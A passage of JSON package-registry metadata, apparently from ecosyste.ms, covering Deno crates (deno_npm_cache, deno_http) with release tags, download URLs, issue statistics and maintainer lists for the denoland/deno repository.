.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T20:50:24.755Z","dependent_packages_count":0,"downloads":54788,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.51081861542895,"dependent_repos_count":24.23734495474355,"dependent_packages_count":32.15060783033682,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":50.63292380016977},"purl":"pkg:cargo/deno_npm_cache","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_npm_cache","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_npm_cache","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_npm_cache/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_cache/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_cache/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_cache/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_cache/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_cache/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_cache/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2024-12-06T00:08:41.930Z","updated_at":"2024-12-06T00:08:41.930Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2024-12-03T00:35:01.112Z","updated_at":"2024-12-03T00:35:01.112Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047433,"name":"deno_http","ecosystem":"cargo","description":"HTTP server implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":255,"first_release_published_at":"2021-07-12T23:33:09.322Z","latest_release_published_at":"2026-08-27T15:21:56.862Z","latest_release_number":"0.256.0","last_synced_at":"2026-09-07T22:56:30.151Z","created_at":"2022-04-12T10:00:41.653Z","updated_at":"2026-09-07T22:56:30.152Z","registry_url":"https://crates.io/crates/deno_http/","install_command":"cargo install deno_http","documentation_url":"https://docs.rs/deno_http/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and 